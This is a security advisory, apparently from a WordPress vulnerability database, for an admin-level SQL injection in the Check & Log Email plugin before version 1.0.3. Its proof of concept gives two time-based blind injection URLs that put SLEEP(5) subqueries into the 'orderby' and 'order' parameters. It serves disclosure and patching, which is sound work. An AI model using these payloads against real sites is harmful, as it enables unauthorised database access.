WordPress Plugin Vulnerabilities
Check & Log Email < 1.0.3 - Admin+ SQL Injections
Description
The plugin does not validate and escape the "order" and "orderby" GET parameters before using them in a SQL statement when viewing logs, leading to SQL injections issues
Proof of Concept
With the 'Enable Log' settings (of the plugin) activated: - https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order=DESC - https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date&order=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-27 (about 2 years ago)
Added
2021-09-27 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)